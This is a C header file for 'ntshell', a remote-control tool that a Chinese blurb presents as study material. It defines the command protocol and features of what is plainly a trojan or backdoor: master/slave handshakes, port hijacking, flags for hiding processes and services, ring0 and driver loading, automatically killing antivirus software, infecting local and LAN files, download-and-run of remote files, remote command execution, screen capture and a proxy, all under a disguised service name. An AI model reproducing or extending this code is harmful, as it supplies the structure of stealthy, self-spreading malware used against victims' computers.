ntshell.h

远程控制系统,可以实现局域网内进行远程控制计算机,很方便,并且是学习用的非常好的资料.

#if !defined(ntshell_h)
#define ntshell_h

#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000

#ifdef __cplusplus
#pragma warning(disable : 4200)
#endif

#define NTSHELL_MINORVERSION 78
#define NTSHELL_MAJORVERSION 0
#define NTSHELL_VERSION (NTSHELL_MINORVERSION | (NTSHELL_MAJORVERSION << 8))

#define CFG_BEGIN 0
#define CFG_END 1
#define CFG_MASTER_ADDR 2
#define CFG_MASTER_ADDR2 3
#define CFG_MASTER_PORT 4
#define CFG_LISTEN_PORT 5
#define CFG_WAIT_MODE 6
#define CFG_NEED_PWD 7
#define CFG_PASSWORD 8
#define CFG_GLOBAL_FLAGS 9
#define CFG_CONN_SPACE 10
#define CFG_PORT_HIJACK 11
#define CFG_RUN_METHOD 12

#define WORK_CONSOLE 0x5c698ea0
#define WORK_CMDSHELL 0x32279732
#define WORK_FILEMANAGER 0x835d2b99
#define WORK_SOCKPROXY 0xf2795541
#define WORK_SCREENCAPTURE 0xdc46070e
#define WORK_PROCESSMANAGER 0xcba01986

#define CONTROL_NEWCONNECT 0x5aba7788
#define CONTROL_QUERYINFO 0x58437964
#define CONTROL_NONE 0x12345678
#define CONTROL_REBOOT 0x774055a1
#define CONTROL_UPDATE 0x774055a2
#define CONTROL_UNINSTALL 0x774055a3
#define CONTROL_EXIT 0x774055a4
#define CONTROL_SHUTDOWN 0x774055a5

#define CONNECT_NEED_PWD 0x86570422
#define CONNECT_INVALID_PWD 0xffff0000

#define CMD_LISTPROCESS 1
#define CMD_KILLPROCESS 2
#define CMD_DOWNLOADFILE 3
#define CMD_EXECUTE 4
#define CMD_NEWINSTANCE 5
#define CMD_RUNCOMMAND 6
#define CMD_SHELLSESSION 7
#define CMD_SOCKPROXY 8
#define CMD_EXITCONSOLE 9

#define STATE_READY 0

#define CONN1_SLAVE_ASK 0x5468e21a
#define CONN1_MASTER_ANSWER 0x7714e029
#define CONN1_SLAVE_OK 0xff3a6bd6
#define CONN2_SLAVE_ASK 0x23516def
#define CONN2_MASTER_ANSWER 0x87654321
#define CONN2_SLAVE_OK 0xa3d51234
#define CONN3_MASTER_ANSWER 0x8566cae0
#define CONN3_SLAVE_OK 0x63374899
#define CONN4_MASTER_ANSWER 0x87845678
#define CONN4_SLAVE_OK 0x87654878

#define FLAG_ALLOW_HIDE_PROCESS 1
#define FLAG_ALLOW_RING0 2
#define FLAG_RUN_SERVICE_ALWAYS 4
#define FLAG_AUTO_KILL_AVSOFT 8
#define FLAG_AUTO_INFECT_FILE 16
#define FLAG_AUTO_INFECT_LAN_FILE 32
#define FLAG_RECORD_ERROR 64
#define FLAG_ALLOW_LOAD_DRIVER 128
#define FLAG_ALLOW_HIDE_SERVICE 256
#define FLAG_RING0_OPEN_FILE 512
#define FLAG_AUTO_BACKUP_FILE 1024

#define COMMAND_PENDING 0
#define COMMAND_FINISH 1
#define CONTROL_DISCONNECT 2
#define BUFFER_SIZE 4096
#define MAX_ADDRESS_LENGTH 64
#define MAX_PASSWORD_LENGTH 32
#define CONFIG_SECTION_SIZE 256
#define SERVICE_NAME "ntwscsvc"

typedef struct _NTSHELL_REQUEST
{
	WORD ClientVersion;
	WORD RequestClass;
	WORD Reserved;
	WORD Reserved2;
	PVOID Request[];
} NTSHELL_REQUEST, *PNTSHELL_REQUEST;

typedef struct _NTSHELL_RESULTSET
{
	WORD ServerVersion;
	WORD ResultClass;
	WORD MessageCode;
	WORD Reserved;
	DWORD ErrorCode;
	DWORD NumberOfResults;
	PVOID ResultSet[];
} NTSHELL_RESULTSET, *PNTSHELL_RESULTSET;

//////////////////////////////////////////////////////////////////////
// 文件管理器接口
//////////////////////////////////////////////////////////////////////

#define FILEMGR_LISTDRIVE 1
#define FILEMGR_LISTFILE 2
#define FILEMGR_GETFILEICON 3
#define FILEMGR_CREATEDIRECTORY 4
#define FILEMGR_REMOVEDIRECTORY 5
#define FILEMGR_READFILE 6
#define FILEMGR_WRITEFILE 7
#define FILEMGR_EXECUTEFILE 8
#define FILEMGR_DELETEFILE 9
#define FILEMGR_COPYFILE 10
#define FILEMGR_MOVEFILE 11
#define FILEMGR_SIMPLYREADFILE 12

typedef struct _FILEMGR_FILEINFO
{
	DWORD FileAttributes;
    FILETIME CreationTime;
    FILETIME LastWriteTime;
    DWORD FileSizeHigh;
    DWORD FileSizeLow;
	CHAR FileName[];
} FILEMGR_FILEINFO, *PFILEMGR_FILEINFO;

typedef struct _FILEMGR_DRIVEINFO
{
	DWORD DriveType;
	CHAR RootPathName[40];
	CHAR VolumeName[16];
	DWORD VolumeSerialNumber;
	CHAR FileSystemName[16];
	ULARGE_INTEGER TotalNumberOfBytes;
	ULARGE_INTEGER TotalNumberOfFreeBytes;
} FILEMGR_DRIVEINFO, *PFILEMGR_DRIVEINFO;

typedef struct _FILEMGR_FILEICON
{
	WORD Width;
	WORD Height;
	WORD BitCount;
	BYTE Bits[];
} FILEMGR_FILEICON, *PFILEMGR_FILEICON;

typedef struct _FILEMGR_FILEREAD
{
	CHAR FileName[MAX_PATH];
    DWORD FileSize;
    FILETIME CreationTime;
    FILETIME LastWriteTime;
	BYTE FileData[];
} FILEMGR_FILEREAD, *PFILEMGR_FILEREAD;

typedef struct _FILEMGR_FILEWRITE
{
	CHAR FileName[MAX_PATH];
    DWORD FileSize;
    FILETIME CreationTime;
    FILETIME LastWriteTime;
	BYTE FileData[];
} FILEMGR_FILEWRITE, *PFILEMGR_FILEWRITE;

typedef struct _FILEMGR_FILENAME
{
	union
	{
		CHAR FileName[];
		CHAR PathName[];
	};
} FILEMGR_FILENAME, *PFILEMGR_FILENAME;

typedef struct _FILEMGR_FILENAME2
{
	CHAR FileName1[MAX_PATH];
	CHAR FileName2[MAX_PATH];
} FILEMGR_FILENAME2, *PFILEMGR_FILENAME2;

//////////////////////////////////////////////////////////////////////
// 进程管理器接口
//////////////////////////////////////////////////////////////////////

#define PROCMGR_LISTPROCESS 1
#define PROCMGR_KILLPROCESS 2
#define PROCMGR_RUN 3
#define PROCMGR_FORCEKILLPROCESS 4

typedef struct _PROCMGR_PROCESSINFO
{
	LARGE_INTEGER ProcessCreateTime;
	LARGE_INTEGER ProcessCpuTime;
	ULONG BasePriority;
	ULONG ProcessId;
	ULONG ParentProcessId;
	ULONG TotalVirtualSizeBytes;
	ULONG TotalPrivateBytes;
	USHORT OffsetOfNextEntry;
	USHORT OffsetOfProcessName;
	USHORT OffsetOfUserName;
	USHORT OffsetOfImagePath;
} PROCMGR_PROCESSINFO, *PPROCMGR_PROCESSINFO;

typedef struct _PROCMGR_PROCESSKILL
{
	ULONG ProcessId;
} PROCMGR_PROCESSKILL, *PPROCMGR_PROCESSKILL;

typedef struct _PROCMGR_PROCESSRUN
{
	WORD ShowWindow;
	WORD Reserved;
	CHAR ImagePath[];
} PROCMGR_PROCESSRUN, *PPROCMGR_PROCESSRUN;

//////////////////////////////////////////////////////////////////////
// 控制台接口
//////////////////////////////////////////////////////////////////////

#define CONSOLE_LISTPROCESS 1
#define CONSOLE_KILLPROCESS 2
#define CONSOLE_DOWNLOADFILE 3
#define CONSOLE_EXECUTE_1 4
#define CONSOLE_EXECUTE_2 5
#define CONSOLE_SENDMESSAGE 6

typedef struct _CONSOLE_PROCESSKILL
{
	ULONG ProcessId;
} CONSOLE_PROCESSKILL, *PCONSOLE_PROCESSKILL;

typedef struct _CONSOLE_FILEDOWNLOAD
{
	CHAR Url[MAX_PATH];
	CHAR SavePath[MAX_PATH];
	BOOL RunIt;
} CONSOLE_FILEDOWNLOAD, *PCONSOLE_FILEDOWNLOAD;

typedef struct _CONSOLE_EXECUTE
{
	BOOL ShowResult;
	DWORD TimeOut;
	CHAR CommandLine[];
} CONSOLE_EXECUTE, *PCONSOLE_EXECUTE;

typedef struct _CONSOLE_MESSAGESEND
{
	ULONG DisplayMethod;
	CHAR MessageText[];
} CONSOLE_MESSAGESEND, *PCONSOLE_MESSAGESEND;

//////////////////////////////////////////////////////////////////////
// 屏幕监视接口
//////////////////////////////////////////////////////////////////////

#define SCREEN_FULL 1
#define SCREEN_DIFFERENCE 2
#define SCREEN_XOR 3

typedef struct _SCREENCAP_SCREENBITMAP
{
	WORD Width;
	WORD Height;
	WORD Depth;
	WORD Method;
	DWORD Size;
	BYTE Bits[];
} SCREENCAP_SCREENBITMAP, *PSCREENCAP_SCREENBITMAP;

//////////////////////////////////////////////////////////////////////
// 端口代理服务接口
//////////////////////////////////////////////////////////////////////

#define PROXYERR_SUCCESS 0
#define PROXYERR_ADDRTOOLONG 1
#define PROXYERR_OPENPORTFAILED 2

//////////////////////////////////////////////////////////////////////
// IO数据包格式
//////////////////////////////////////////////////////////////////////

typedef struct _PACK_TYPE_1
{
	DWORD dwPackType : 2;
	DWORD nPackSize : 30;
	BYTE bPackData[];
} PACK_TYPE_1, *PPACK_TYPE_1;

typedef struct _PACK_TYPE_2
{
	DWORD dwPackType : 2;
	DWORD nPackSize : 30;
	DWORD dwCrc32;
	BOOL bCompressed : 1;
	BOOL bEncrypted : 1;
	DWORD nOriginalSize : 30;
	BYTE bPackData[];
} PACK_TYPE_2, *PPACK_TYPE_2;

//////////////////////////////////////////////////////////////////////
// 系统信息查询接口
//////////////////////////////////////////////////////////////////////

#define QUERY_ENDQUERY 0
#define QUERY_PROCESSORNAME 1
#define QUERY_PROCESSORMHZ 2
#define QUERY_PHYSMEMORYSIZE 3
#define QUERY_SYSTEMVERSION 4
#define QUERY_COMPUTERNAME 5
#define QUERY_CURRENTUSERNAME 6
#define QUERY_SYSTEMROOT 7
#define QUERY_NTSHELLVERSION 8

typedef struct _QUERY_INFORMATION
{
	WORD InformationClass;
} QUERY_INFORMATION, *PQUERY_INFORMATION;

typedef struct _QUERY_RESULTSET
{
	WORD InformationClass;
	WORD InformationLength;
	BYTE Information[];
} QUERY_RESULTSET, *PQUERY_RESULTSET;

//////////////////////////////////////////////////////////////////////
// 服务端消息代码
//////////////////////////////////////////////////////////////////////

#define MSG_NONE 0
#define MSG_RING0_DISABLED 1

#endif